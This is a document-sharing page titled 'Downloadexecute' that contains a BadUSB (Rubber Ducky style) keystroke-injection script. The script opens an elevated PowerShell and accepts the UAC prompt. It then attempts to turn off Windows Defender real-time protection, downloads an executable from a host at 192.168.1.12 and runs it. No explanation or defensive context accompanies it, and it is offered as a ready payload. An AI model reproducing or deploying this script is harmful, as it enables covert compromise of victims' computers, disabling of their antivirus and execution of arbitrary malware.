Downloadexecute

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

GUI r

DELAY 200
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 900
STRING Set-MpPreference -DisableRea $true;
$d = New-Object System.Net.WebClient;
$f = '1.exe';
$d.DownloadFile('http://192.168.1.12/s.exe',$f);
$e = New-Object -com shell.application; $e.shellexecute($f);
exit;

You might also like